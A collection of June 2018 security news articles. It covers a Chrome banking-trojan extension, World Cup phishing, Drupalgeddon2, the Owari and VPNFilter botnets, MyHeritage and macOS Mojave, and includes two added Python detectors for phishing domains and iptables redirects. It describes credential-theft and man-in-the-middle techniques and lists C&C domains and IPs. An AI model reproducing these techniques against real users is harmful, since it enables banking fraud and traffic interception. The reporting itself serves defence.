A MitM extension for Chrome
8.6.2018 Kaspersky
Virus
Browser extensions make our lives easier: they hide obtrusive advertising, translate text, help us choose in online stores, etc. There are also less desirable extensions, including those that bombard us with advertising or collect information about our activities. These pale into insignificance, however, when compared to extensions whose main aim is to steal money. To protect our customers, we automatically process large numbers of extensions from a variety of sources. This includes downloading and analyzing suspicious extensions from Chrome Web Store. One extension, in particular, recently caught our attention because it communicated with a suspicious domain.

The Google Chrome extension named Desbloquear Conteúdo (which means ‘Unblock Content’ in Portuguese) targeted users of Brazilian online banking services – all the attempted installations that we traced occurred in Brazil. The aim of this malicious extension is to harvest user logins and passwords and then steal money from their bank accounts. Kaspersky Lab products detect the extension as HEUR:Trojan-Banker.Script.Generic.

Geographic distribution of security product detections of the script fundo.js, one of the extension components

By the time of publication, the malicious extension had already been removed from Chrome Web Store.

The malicious extension in Chrome Web Store

Analysis of malicious extension
Malicious browser extensions often use different techniques (e.g. obfuscation) to prevent detection by security software. The developers of this specific extension, however, didn’t obfuscate its source code, opting instead for a different approach. This piece of malware uses the WebSocket protocol for data communication, making it possible to exchange messages with the C&C server in real time. This means the C&C starts acting as a proxy server to which the extension redirects traffic when the victim visits the site of a Brazilian bank. Essentially, this is a man-in-the-middle attack.

The Desbloquear Conteúdo extension consists of two JS scripts. Let’s take a closer look at them.

fundo.js
The first thing that catches the eye in the script’s code is the function websocket_init(). This is where a WebSocket connection is established. Data is then downloaded from the server (ws://exalpha2018[.]tk:2018) and saved to chrome.storage under the key ‘manualRemovalStorage’.

Download of data from C&C via a WebSocket connection

Data downloaded and saved by the extension

As a result of contacting hxxp://exalpha2018[.]tk/contact-server/?modulo=get, the extension receives the IP address to which user traffic will be redirected.

IP address received from C&C server

The IP to which all user traffic is then redirected

It’s worth mentioning Proxy Auto Configuration (PAC) here. Modern browsers can use a special file written in JavaScript which defines just one function, FindProxyForURL. Through this function, the browser determines which proxy server (if any) to use when connecting to a given domain.

The fundo.js script uses Proxy Auto Configuration when the function implement_pac_script is called. This replaces FindProxyForURL with a new function that redirects user traffic to the malicious server, but only when the user visits the web page of a Brazilian bank.

Changing browser settings to redirect user traffic

pages.js
In this script, the following section of code is the most important:

Execution of the downloaded malicious code on web pages belonging to banks

Just like with fundo.js, data downloaded from the server is saved to manualRemovalStorage. The data includes the domains of several Brazilian banks and the code the browser should execute if a user visits one of the relevant sites.

pages.js downloads the following scripts from the domain ganalytics[.]ga and launches them on the banks’ sites:

ganalytics[.]ga/bbf.js,
ganalytics[.]ga/bbj.js,
ganalytics[.]ga/cef.js,
ganalytics[.]ga/itf.js,
ganalytics[.]ga/itf_new.js.

Web Antivirus detection statistics for attempts to contact ganalytics[.]ga

All the above scripts have similar functionalities and are designed to steal the user’s credentials. Let’s take a look at one of them.

cef.js
One of this script’s functions is to add specific HTML code to the main page of the online banking system.

Addition of malicious code to the web page

A closer look at the code that’s returned after contacting the server reveals that it’s needed to collect the one-time passwords used for authentication on the bank’s site.

Interception of users’ one-time passwords

If a user is on the page where logins and passwords are entered, the script creates a clone of the ‘Enter’ button, along with a function that handles clicks on it. This function stores the password in a cookie for subsequent transfer to the C&C and then clicks the real button, which is overlaid and hidden from the victim.

Copy of the ‘Enter’ button is created and the login and password for an online banking service are intercepted

As a result, the password to the user’s account is sent to the online banking system as well as to the malicious server.

Sending of all intercepted data to the C&C

Additional analysis of the web resources used in the attack (courtesy of the KL Threat Intelligence Portal) yields some interesting information. In particular, the aforementioned ganalytics[.]ga is registered in the Gabon domain zone, which is why WHOIS services don’t provide much information about it:

WHOIS info for ganalytics[.]ga

However, the IP address where it’s hosted is also associated with several other interesting domains.

A fragment of DNS data from KSN

It’s clear that this IP address is (or was) associated with several other domains with tell-tale names containing the keywords advert, stat, analytic and registered in Brazil’s domain zone. It’s noteworthy that many of them were involved in distributing web miners last autumn, with the mining scripts being downloaded when legitimate Brazilian bank sites were visited.

Fragments of KSN data related to advstatistics.com[.]br

When malware is loaded while the user is visiting a legitimate site, it usually indicates that traffic is being modified locally on the user’s computer. Other aspects of this case, namely that it targeted Brazilian users and used the same IP address seen in previous attacks, suggest that this browser extension (or related versions of it) earlier had functionality to inject cryptocurrency mining scripts into the banking sites users were visiting at the time the extension was downloaded to their devices.

Conclusion
Browser extensions designed to steal logins and passwords are quite rare. However, they need to be taken seriously given the potential damage they could cause. We recommend that users only install verified extensions with large numbers of installations and reviews in Chrome Web Store or another official service. In spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published in them – we’ve covered one such case. Also, it wouldn’t hurt to have a security product installed on your device that issues a warning whenever an extension acts suspiciously.


2018 Fraud World Cup
8.6.2018 Kaspersky CyberCrime

There are only two weeks to go before the start of the massive soccer event — FIFA World Cup. This championship has already attracted the attention of millions worldwide, including a fair few cybercriminals. Long before kick-off, email accounts began bulging with soccer-related spam, and scammers started exploiting the topic in mailings and creating World Cup-themed phishing pages.

Our statistics show spikes in the number of phishing pages during match ticket sales. Every time tickets went on sale, fraudsters mailed out spam and activated clones of official FIFA pages and sites offering fake giveaways allegedly from partner companies. But as the event draws nearer, cyber scams are reaching fever pitch. We present our observations below.

Fake lottery win notifications
One of the main types of World Cup-related email fraud is spam informing recipients of cash winnings in lotteries supposedly held by official partners and sponsors (Visa, Coca-Cola, Microsoft, etc.), as well as FIFA itself.

Examples of fake lottery win notifications

Such messages contain attachments (usually PDF or DOCX documents) in which the “winner” is congratulated and told to forward detailed contact details (name, date of birth, address, email, telephone no.) in order to receive the prize. Sometimes recipients are asked to pay a part of the postage or bank transfer fees.

Such mailouts are aimed primarily at harvesting user data (including financial), plus picking up a small money transfer. Such messages can also contain malicious attachments, for example, Trojan-Banker programs.

Examples of fake notifications with attached documents

Another type of common spam fraud is an offer to take part in a ticket giveaway or win a trip to a match. Victims are required either to register on a fake promotion page and provide an email address, or, as in the case of lottery emails, to send the “organizers” their contact details. Such messages are sent in the name of FIFA, usually from addresses on recently registered domains. The purpose of such schemes is mainly to update email databases so as to distribute yet more spam.

Examples of messages with ticket and trip giveaways

Advertising spam
In the runup to the championship, we registered a lot of advertising spam with offers for soccer merchandise, transport/accommodation services, and travel packages from various tour operators. Merchandise was generally offered by small online retailers and included toys, souvenirs, and stationery marked with official logos, as well as soccer jerseys for all teams taking part. Some messages even resemble mailings from the official FIFA store.

Examples of messages offering merchandise

There were also spam mailings unrelated to soccer, for example traditional spam offering medical products but using the World Cup to attract attention. Interestingly, the message subject referred to the 2006 World Cup final. Perhaps the spammers used an old template and forgot to change the date.

Wrong year, same product

Ticket sales
Besides online stores selling merchandise, there are plenty of sites offering match tickets, both fake and real. But real doesn’t necessarily mean bona fide: they are often sold by ticket scalpers exploiting various loopholes in the FIFA rules.

Online scalpers selling tickets for an arm and a leg

However, official tickets can only be bought on the official FIFA website, and large fines are imposed for their illegal sale or resale. Those who use the services of speculators risk being turned away at the stadium: tickets are personalized, and if the bearer fails to show ID matching the information in the ticket, FIFA staff have the right to refuse entry.

Fake sites and messages from partners
One of the most popular ways to steal credentials for bank and other accounts is to create counterfeit imitations of official partner websites. Partner organizations quite often arrange ticket giveaways for clients, and this is what attackers exploit to lure users onto fake promotion sites. Such pages look very convincing: well-designed with a working interface, hard to tell from the real thing.

Phishing login page supposedly of a partner bank

Attempt to gain access to an account on a partner company site under the guise of a ticket giveaway

Scammers also try to extract data by mimicking official FIFA notifications. The victim is informed that the security system has been updated and all personal data must be re-entered to avoid lockout. The link in the message takes the victim far away from FIFA to a fake personal account. Naturally, all data entered flows straight to the scammers.

Example of a phishing email seemingly from FIFA

Cybercriminals are particularly keen to target clients of Visa, the tournament’s commercial sponsor, and offer prize giveaways in the name of this international payment heavyweight. To take part, users need to follow a link that unsurprisingly points to a phishing site (the domain was registered a couple of months ago and has nothing to do with the payment system), where they are asked to enter their bank card details, including the CVV/CVC code.

Example of a message and phishing page in the name of Visa

Fraud allsorts
Alongside social engineering, phishers deploy malicious programs in the pursuit of users’ personal data and cash. For example, a fake site offering online broadcasts can plant malware on the victim’s computer under the guise of a Flash Player update required to view the match.

In some cases, phishers have no interest at all in bank accounts and payment details. For instance, under the pretext of receiving a World Cup-themed update for the video game FIFA Soccer, users are prompted to enter their account credentials for the Origin platform on a fake login page. If there are games of interest under the victim’s profile, the cybercriminals change the login/password and link the account to a new email address for subsequent resale.

Fake Origin login page

In late May, a few weeks before the start of the championship, phishing emails offering cheap flights from the major airlines were all the rage. In addition to fake soccer ticket giveaways, there were draws seemingly on behalf of airlines offering free plane tickets.

Fake ticket giveaway in the name of a major airline

Tricks of the trade
To make their sites seem credible, cybercriminals register domain names combining the words “world,” “worldcup,” “FIFA,” “Russia,” etc. (for example: worldcup2018, russia2018, fifarussia). Normally, though not always, such domains look unnatural (for instance, fifa.ucozx.site) and have a non-standard domain extension. So in most cases, a close look at the link in the email or the URL after opening the site should be enough to avoid the bait.

DNS WHOIS data for phishing sites

Likewise, to lull users’ vigilance, cybercriminals acquire the cheapest SSL certificates available: the issuing authorities often do not verify the existence of the entity acquiring the certificate, meaning that the scammers get the all-important HTTPS in front of their address. To spot a fake, it is enough to look at the domain’s WHOIS data. Scam websites tend to have been registered quite recently and for a short time, and their owners are usually private individuals. What’s more, detailed information about the owner is often hidden.
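The domain-name and WHOIS signals from the two paragraphs above (lure words in the name, odd extension or brand-as-subdomain, fresh and short registration, hidden owner), folded into one scoring heuristic as an added example that is not Kaspersky’s code. The record layout, the common-TLD list, the 180-day age and one-year term cut-offs and the three-signal threshold are assumptions of the example; every sample record and date is constructed.

```python
import re
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Tuple

# Name fragments the article says scammers combine in lookalike domains.
LURE_TOKENS = ("worldcup", "world", "fifa", "russia", "2018")
# Extensions treated as ordinary for this heuristic (an assumption of the
# example); anything else is reported as a non-standard extension.
COMMON_TLDS = {"com", "org", "net"}
# Typical wording of privacy/proxy registrants in WHOIS output.
PRIVACY_HINT = re.compile(r"redacted|privacy|proxy|whoisguard", re.IGNORECASE)


@dataclass
class WhoisRecord:
    domain: str
    created: date
    expires: date
    registrant: str    # organisation name, or a privacy/proxy placeholder


def score_domain(rec: WhoisRecord, today: date) -> Tuple[int, List[str]]:
    """Return (score, reasons); each reason is one of the article's signals.

    No public-suffix list is used: the last two labels are assumed to be the
    registrable domain, which is right for the examples here but not for
    every TLD."""
    reasons: List[str] = []
    labels = rec.domain.lower().strip(".").split(".")
    tld, name = labels[-1], ".".join(labels[:-1])
    if any(tok in name for tok in LURE_TOKENS):
        reasons.append("World Cup lure token in the name")
    if tld not in COMMON_TLDS:
        reasons.append(f"non-standard extension .{tld}")
    # e.g. fifa.ucozx.site: the brand sits in a subdomain of someone else's site
    if len(labels) > 2 and any(tok in lbl for lbl in labels[:-2] for tok in LURE_TOKENS):
        reasons.append("brand placed in a subdomain of another site")
    age = (today - rec.created).days
    if age < 180:
        reasons.append(f"registered only {age} days ago")
    term = (rec.expires - rec.created).days
    if term <= 366:
        reasons.append("registered for a single year or less")
    if PRIVACY_HINT.search(rec.registrant):
        reasons.append("registrant details hidden")
    return len(reasons), reasons


def is_suspicious(rec: WhoisRecord, today: date, threshold: int = 3) -> bool:
    """Three or more signals together is the cut-off chosen for this example."""
    return score_domain(rec, today)[0] >= threshold


# Constructed "now" for the example, close to the article's date.
TODAY = date(2018, 6, 8)

# Constructed WHOIS records: two lookalikes and one long-lived official-style
# entry (its dates and registrant are made up for the example).
SAMPLE_RECORDS: Dict[str, WhoisRecord] = {
    "worldcup2018-tickets.site": WhoisRecord(
        "worldcup2018-tickets.site", date(2018, 4, 1), date(2019, 4, 1),
        "REDACTED FOR PRIVACY"),
    "fifa.ucozx.site": WhoisRecord(
        "fifa.ucozx.site", date(2018, 5, 20), date(2019, 5, 20),
        "Whois Privacy Corp"),
    "fifa.com": WhoisRecord(
        "fifa.com", date(1995, 1, 1), date(2025, 1, 1),
        "Example Football Federation (constructed)"),
}


if __name__ == "__main__":
    for rec in SAMPLE_RECORDS.values():
        score, reasons = score_domain(rec, TODAY)
        verdict = "SUSPICIOUS" if is_suspicious(rec, TODAY) else "ok"
        print(f"{rec.domain:28s} {verdict:10s} {score} {'; '.join(reasons)}")
```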

Besides active domain names, we logged a large number of “sleepers”: on them you might find a placeholder page, if that. Cybercriminals use them as a backup: if one domain is blocked, the site moves to the next.

Examples of backup domain names

Conclusion
The above describes only the most popular scams exploiting the World Cup theme. Nevertheless, it provides a fairly complete picture of how cybercriminals operate and what they want. In addition to the above, we expect shortly to see an explosion of phishing sites offering cheap airline tickets to World Cup host cities, as well as fake mailings supposedly from popular accommodation services with “special offers.”

To avoid being duped, follow these simple rules:

Buy tickets only on the official FIFA website or at official ticket offices.
For online purchases (not only during the tournament), get a separate bank card and set a spending limit.
Do not open links or attachments in emails from unknown senders, even if they seem legitimate.
Check the addresses of links in notifications from known services; at the slightest suspicion, do not click, but open the site manually in the browser.
To preserve your money and nerves, never buy products advertised in spam.
Use the latest security solutions to protect against cyberthreats, and keep the databases up-to-date.


Marcus Hutchins, WannaCry-killer, hit with four new charges by the FBI
8.6.2018 thehackernews  Crime


Marcus Hutchins, the British malware analyst who helped stop the global WannaCry menace, is now facing four new charges related to malware he allegedly created and promoted online to steal financial information.
Hutchins, the 24-year-old better known as MalwareTech, was arrested by the FBI last year as he was headed home to England from the DefCon conference in Las Vegas for his alleged role in creating and distributing Kronos between 2014 and 2015.
Kronos is a Banking Trojan designed to steal banking credentials and personal information from victims' computers, which was sold for $7,000 on Russian online forums, and the FBI accused Hutchins of writing and promoting it online, including via YouTube.


Hutchins pleaded not guilty at a court hearing in August 2017 in Milwaukee and was released on $30,000 bail.
However, earlier this week, a revised superseding indictment [PDF] was filed with the Wisconsin Eastern District Court, under which Hutchins faces four new charges along with the six prior counts filed against him by the FBI a month before his arrest.
Marcus Accused of Creating and Selling Another Malware
According to the new indictment, Hutchins created a second piece of malware, known as "UPAS Kit," and also lied to the Federal Bureau of Investigations (FBI) when he was arrested and questioned last year in Las Vegas.
As described by prosecutors, UPAS Kit is a spybot virus that "allowed for the unauthorized exfiltration of information from protected computers" and "used a form grabber and web injects to intercept and collect personal information," including credit card details.
UPAS Kit was advertised to "install silently and not alert antivirus engines," at prices above $1,000 back in 2012.
According to the indictment, Hutchins created UPAS Kit in 2012, when he was just 18, and sold it online to another unnamed co-defendant identified as "VinnyK" (aka Aurora123), who was also involved in promoting Kronos.


VinnyK then sold UPAS Kit to another person in Wisconsin in 2012, who allegedly used the malware to attack computers in the United States.
Two other charges relate to Hutchins "aiding and abetting" the distribution of invasive code in an attempt to damage "10 or more protected computers," and helping others to hack computers for financial gain.
Marcus Appealed to his Followers for Donations to Cover Legal Costs
As the news on the revised indictment broke, Hutchins, who has repeatedly denied any illegal activity, called the charges "bullshit" and appealed to his Twitter followers for donations to cover legal costs.
"Spend months and $100k+ fighting this case, then they go and reset the clock by adding even more bullshit charges like 'lying to the FBI,'" Hutchins wrote on his Twitter, calling for donations by adding a quote from the StarCraft video game: "We require more minerals."
Hutchins' lawyer Brian Klein called the charges "meritless" and said he expects his client to be cleared of all charges.
"[We] are disappointed the govt has filed this superseding indictment, which is meritless," Klein tweeted. "It only serves to highlight the prosecution's serious flaws. We expect [Hutchins] to be vindicated and then he can return to keeping us all safe from malicious software."
Hutchins, who is living in Los Angeles on bail, has been unable to leave the United States since last year due to the pending criminal charges.
Hutchins stormed to fame and was hailed as a hero early last year when he accidentally stopped the global epidemic of the WannaCry ransomware attack that crippled computers all across the world.


Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit
8.6.2018 thehackernews 
Exploit

Hundreds of thousands of websites running on the Drupal CMS—including those of major educational institutions and government organizations around the world—have been found vulnerable to a highly critical flaw for which security patches were released almost two months ago.
Security researcher Troy Mursch scanned the whole Internet and found that over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repeated warnings.


Drupalgeddon2 (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites.
For those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user.
Since Drupalgeddon2 was likely to attract the attention of motivated attackers, the Drupal team urged all website administrators to install the security patches immediately after their release in late March, and initially decided not to release any technical details of the flaw.

However, attackers started exploiting the vulnerability only two weeks later, after complete details and proof-of-concept (PoC) exploit code for Drupalgeddon2 were published online, which was followed by large-scale Internet scanning and exploitation attempts.


Shortly after that, we saw attackers develop automated exploits leveraging the Drupalgeddon2 vulnerability to inject cryptocurrency miners, backdoors, and other malware into websites within a few hours of its details going public.
Mursch scanned the Internet and found nearly 500,000 websites running Drupal 7, of which 115,070 were still running an outdated version vulnerable to Drupalgeddon2.
While analyzing the vulnerable websites, Mursch noticed that hundreds of them—including those of the Belgian police, the Colorado Attorney General's office, Fiat subsidiary Magneti Marelli and a food truck locating service—have already been targeted by a new cryptojacking campaign.
Mursch also found some infected websites in the campaign that had already upgraded to the latest Drupal version, but the cryptojacking malware was still present.
We have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the "backdoors or fix compromised sites." To fully resolve the issue, follow this Drupal guide.


IoT Botnets Found Using Default Credentials for C&C Server Databases
8.6.2018 thehackernews  IoT  BotNet

Not following cybersecurity best practices can cost not only online users but also cybercriminals. Yes, sometimes hackers don't take the best security measures to keep their own infrastructure safe.
An IoT botnet variant called Owari, which relies on default or weak credentials to hack insecure IoT devices, was itself found using default credentials for the MySQL server integrated with its command and control (C&C) server, allowing anyone to read and write its database.
Ankit Anubhav, principal security researcher at IoT security firm NewSky Security, who found the botnets, published a blog post about his findings earlier today, detailing how the botnet authors themselves kept an incredibly weak username and password combination for their C&C server's database.


Guess what the credentials could be?
Username: root
Password: root
These login credentials helped Anubhav gain access to the botnet and fetch details about infected devices, the botnet authors who control the botnet and also some of their customers (a.k.a. black box users), who have rented the botnet to launch DDoS attacks.
"Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the botmaster is available) and cooldown time (time interval between the two attack commands) can also be observed," Anubhav wrote.

Besides this, Anubhav was also able to see the duration limit of the attack such as for how long a client can perform the DDoS attack, maximum available bots for an attack, and the list of various IPs targeted by the DDoS attack.
Anubhav also found another botnet, which was also built with a version of Owari and its database was also exposed via weak credentials.
The C&C servers of both the botnets were located at 80.211.232.43 and 80.211.45.89, which are now offline, as "botnet operators are aware that their IPs will be flagged soon due to the bad network traffic," Anubhav wrote. "Hence to stay under the radar, they often voluntarily change attack IPs."


All New Privacy and Security Features Coming in macOS 10.14 Mojave
8.6.2018 thehackernews  Apple

At Worldwide Developer Conference 2018 on Monday, Apple announced the next version of its macOS operating system, and it's called Mojave.
Besides introducing new features and improvements of macOS 10.14 Mojave—like Dark Mode, Group FaceTime, Dynamic Desktop, and Finder—at WWDC, Apple also revealed a bunch of new security and privacy features coming with the next major macOS update.
Apple CEO Tim Cook said the new features included in Mojave are "inspired by pro users, but designed for everyone," helping protect you from various security threats.
Here's a list of all macOS Mojave security and privacy features:
Safari's Enhanced "Intelligent Tracking Prevention"
It's no longer shocking that your online privacy is being invaded, and everything you search online is being tracked—thanks to third-party trackers present on the Internet in the form of social media like and sharing buttons that marketers and data brokers use to monitor web users as they browse.


But not anymore. With macOS Mojave, Safari has updated its "Intelligent Tracking Prevention"—a feature that limits the tracking ability of websites that use various ad-tracking and device fingerprinting techniques.
The all-new enhanced Intelligent Tracking Prevention will now automatically block all third-party trackers, including social media "Like" or "Share" buttons, as well as comment widgets from tracking users without their permission.
Safari will also help in defeating the "device fingerprinting" approach by exposing only generic configuration information of users' device and default fonts.
End-to-End Encrypted Group FaceTime (Up to 32 People)

This is a significant security improvement: at WWDC 2018, Apple introduced a group FaceTime feature that lets groups of up to 32 people hold video calls at the same time, with end-to-end encryption just like the existing one-to-one audio and video calls and group audio calls.
End-to-end encryption for group calls in the FaceTime app means that there's no way for Apple or anyone else to decrypt the data while it's in transit between devices.
macOS Mojave Will Alert When Your Camera & Mic Are Accessed
As we have reported several times in the past few years, cybercriminals have been spreading new macOS malware that targets the built-in webcam and microphone to spy on users without detection.


To address this threat, macOS Mojave adds a new feature that monitors access to your Mac's webcam and microphone and alerts you with new permission dialogs whenever an app tries to access the camera or microphone.
This new protection has primarily been designed to prevent malicious software from silently turning on these device features in order to spy on its users.
User Permission Required for Access to Personal Data
macOS Mojave also adds similar permission requirements for apps to access personal data like the mail database, message history, file system and backups.
By default, macOS Mojave will also protect your location information, contacts, photos, Safari data, mail database, message history, iTunes device backups, calendar, reminders, Time Machine backups, cookies, and more.
Secure (and Convenient) Password Management
We have long urged users to follow good password practice by keeping their passwords strong and unique for every website or service. Now, Apple has made that easier in macOS 10.14 Mojave and iOS 12.
While Safari in macOS has provided password suggestions for years when users are asked to create a login at a site, Apple has improved this feature in a way that Safari now automatically generates strong passwords, enters them into the web browser, and stores them in the iCloud keychain when users create new online accounts.
Previously, third-party password manager apps handled most of these tasks; now Apple is integrating such functionality directly into the next major versions of both macOS and iOS.


The company also announced a new feature that even flags reused passwords so that users can change them, a new interface that autofills one-time passwords provided by authentication apps, and a mechanism that shares passwords across all of a user's nearby devices, including iOS devices, Macs, and Apple TVs.
macOS Mojave Moves Software Updates from App Store to System Preferences
With the new macOS Mojave, Apple has also redesigned its Mac App Store a little bit and moved the system update mechanism to the System Preferences from the Mac App Store.
Apple has reintroduced the "Software Update" option in the System Preferences window, allowing users to update their operating system and native software without opening the App Store.
Moreover, Apple has also confirmed that Mojave will be its last version of macOS to support legacy 32-bit apps.
As in High Sierra, users will be shown a dialog box when opening 32-bit apps in macOS 10.14 Mojave (beta 1) with a message telling them that "This app will not work with future versions of macOS."


MyHeritage Says Over 92 Million User Accounts Have Been Compromised
8.6.2018 thehackernews Incident

MyHeritage, the Israel-based DNA testing service designed to investigate family history, has disclosed that the company website was breached last year by unknown attackers, who stole login credentials of its more than 92 million customers.
The company learned about the breach on June 4, 2018, after an unnamed security researcher discovered a database file named "myheritage" on a private server located outside of the company, and shared it with MyHeritage team.


After analyzing the file, the company found that the database, which included the email addresses and hashed passwords of nearly 92.3 million users, belonged to customers who had signed up for the MyHeritage website before October 27, 2017.
While the MyHeritage security team is still investigating the data breach to identify any potential exploitation of its systems, the company confirmed that no other data, such as credit card details, family trees or genetic data, was breached; that data is stored on separate systems.
"Credit card information is not stored on MyHeritage to begin with, but only on trusted third-party billing providers (e.g., BlueSnap, PayPal) utilized by MyHeritage," MyHeritage wrote in a blog post published today.
"Other types of sensitive data such as family trees and DNA data are stored by MyHeritage on segregated systems, separate from those that store the email addresses, and they include added layers of security. We have no reason to believe those systems have been compromised."
MyHeritage also confirmed that there was no evidence of account compromise.


The company also notes that it does not store its customers' passwords in plaintext; instead, the affected website uses a hashing algorithm with a unique salt to protect users' passwords, making them more resilient to cracking.
Therefore, the stolen passwords are probably safe, but the company still advised all of its users to change their passwords and choose a stronger, unique one, just to be on the safe side.
MyHeritage said it had hired an independent cybersecurity firm to conduct a forensic investigation of the data breach. The company also said it is adding a two-factor authentication feature as an option for users.


Destructive and MiTM Capabilities of VPNFilter Malware Revealed
8.6.2018 thehackernews 
Virus

It turns out that the threat of the massive VPNFilter botnet malware that was discovered late last month is beyond what we initially thought.
Security researchers from Cisco's Talos cyber intelligence have today uncovered more details about VPNFilter malware, an advanced piece of IoT botnet malware that infected more than 500,000 routers in at least 54 countries, allowing attackers to spy on users, as well as conduct destructive cyber operations.
Initially, it was believed that the malware targets routers and network-attached storage from Linksys, MikroTik, NETGEAR, and TP-Link, but a more in-depth analysis conducted by researchers reveals that the VPNFilter also hacks devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, QNAP, UPVEL, and ZTE.


"First, we have determined that are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link," the researchers say.
To hijack devices from the affected vendors listed above, the malware simply relies on publicly known vulnerabilities or uses default credentials, instead of exploiting zero-day vulnerabilities.
VPNFilter 'ssler' — Man-in-the-Middle Attack Module

Besides this, the researchers primarily shared technical details on a new stage 3 module, named "ssler," which is an advanced network packet sniffer that, if installed, allows hackers to intercept network traffic passing through an infected router and deliver malicious payloads using man-in-the-middle attacks.
"Ssler module provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80," the researchers say.
This 3rd-stage module also makes the malware capable of maintaining a persistent presence on an infected device, even after a reboot.
The ssler module has been designed to deliver custom malicious payloads for specific devices connected to the infected network using a parameter list, which defines the module's behavior and which websites should be targeted.
These parameters include settings to define the location of a folder on the device where stolen data should be stored, the source and destination IP address for creating iptable rules, as well as the targeted URL of the JavaScript injection.


To set up packet sniffing for all outgoing web requests on port 80, the module configures the device's iptables immediately after installation to redirect all network traffic destined for port 80 to its local service listening on port 8888.
"To ensure that these rules do not get removed, ssler deletes them and then adds them back approximately every four minutes," the researchers explain.
To target HTTPS requests, the ssler module also performs an SSLStrip attack, i.e., it downgrades HTTPS connections to HTTP, forcing victims' web browsers to communicate over plaintext HTTP.
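A defender-side check for the two ssler behaviours described above, the port-80 redirect to a local port and the periodic delete-and-re-add of the rule, added as an example that is neither Talos's nor the malware's code. It parses `iptables-save` output, which the article does not show, so the sample dump from a hypothetical router is constructed; a real check would run the same parser over periodic dumps pulled from the device.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Sequence

# Constructed iptables-save output from a hypothetical router: one port-80
# redirect of the kind the article describes, next to ordinary NAT/filter rules.
SAMPLE_DUMP = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8888
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""


@dataclass(frozen=True)
class Redirect:
    table: str
    chain: str
    dport: int
    to_port: int   # where the diverted traffic actually ends up
    rule: str      # the raw rule line, handy for alert text


def find_web_redirects(dump: str, watched: Sequence[int] = (80, 443)) -> List[Redirect]:
    """Return every REDIRECT/DNAT rule that diverts traffic bound for a watched
    port.  Transparent proxies and captive portals produce the same rule shape,
    so a hit is something to explain, not by itself proof of infection."""
    hits: List[Redirect] = []
    table = ""
    for raw in dump.splitlines():
        line = raw.strip()
        if line.startswith("*"):            # table header, e.g. *nat
            table = line[1:]
            continue
        if not line.startswith("-A "):      # only append-rule lines carry rules
            continue
        chain = re.match(r"-A (\S+)", line).group(1)
        dport = re.search(r"--dport (\d+)", line)
        target = re.search(r"-j (REDIRECT|DNAT)\b", line)
        if not (dport and target) or int(dport.group(1)) not in watched:
            continue
        # REDIRECT names a local port; DNAT names host[:port] (port optional).
        if target.group(1) == "REDIRECT":
            to = re.search(r"--to-ports (\d+)", line)
        else:
            to = re.search(r"--to-destination [^\s:]+:(\d+)", line)
        to_port = int(to.group(1)) if to else int(dport.group(1))
        hits.append(Redirect(table, chain, int(dport.group(1)), to_port, line))
    return hits


def redirect_churn(snapshots: Sequence[str]) -> Dict[str, int]:
    """Count how often each redirect rule appears after having been absent,
    across successive iptables-save snapshots.  A rule that keeps vanishing and
    coming back is the delete-and-re-add behaviour the article attributes to
    ssler; a static legitimate proxy rule counts once and stays at one."""
    seen_before: set = set()
    appearances: Dict[str, int] = {}
    for dump in snapshots:
        current = {h.rule for h in find_web_redirects(dump)}
        for rule in current - seen_before:
            appearances[rule] = appearances.get(rule, 0) + 1
        seen_before = current
    return appearances


if __name__ == "__main__":
    for hit in find_web_redirects(SAMPLE_DUMP):
        print(f"[{hit.table}/{hit.chain}] port {hit.dport} -> {hit.to_port}: {hit.rule}")
```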
VPNFilter 'dstr' — Device Destruction Module
As briefed in our previous article, VPNFilter also has a destructive capability (dstr module) that can be used to render an infected device unusable by deleting files necessary for normal device operation.
The malware triggers a killswitch for routers, where it first deliberately kills itself, before deleting the rest of the files on the system [named vpnfilter, security, and tor], possibly in an attempt to hide its presence during the forensic analysis.
This capability can be triggered on individual victim machines or en masse, potentially cutting off internet access for hundreds of thousands of victims worldwide.
Simply Rebooting Your Router is Not Enough
Despite the FBI seizure of a key command and control server right after the discovery of VPNFilter, the botnet still remains active, due to its versatile, multi-stage design.
Stage 1 of the malware can survive a reboot, gaining a persistent foothold on the infected device and enabling the deployment of stages 2 and 3 malware. So, each time an infected device is restarted, stages 2 and 3 are re-installed on the device.


This means that, even after the FBI seized the key C&C server of VPNFilter, the hundreds of thousands of devices already infected with the malware likely remain infected with stage 1, which later installs stages 2 and 3.
Therefore, rebooting alone is not enough to completely remove the VPNFilter malware from infected devices, and owners of consumer-grade routers, switches, and network-attached storage devices need to take additional measures, which vary from model to model. Router owners are advised to contact their manufacturer for details.
For some devices, resetting routers to factory default could remove the potentially destructive malware, along with removing stage 1, while some devices can be cleaned up with a simple reboot, followed by updating the device firmware.
And as I said earlier, mark these words again: if your router cannot be updated, throw it away and buy a new one. Your security and privacy is more than worth a router's price.


Update Google Chrome Immediately to Patch a High Severity Vulnerability
8.6.2018 thehackernews 
Vulnerability

You must update your Google Chrome now.
Security researcher Michał Bentkowski discovered and reported a high severity vulnerability in Google Chrome in late May, affecting the web browser on all major operating systems including Windows, Mac, and Linux.
Without revealing any technical details about the vulnerability, the Chrome security team described the issue as incorrect handling of the CSP header (CVE-2018-6148) in a blog post published today.
"Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed," the Chrome security team notes.
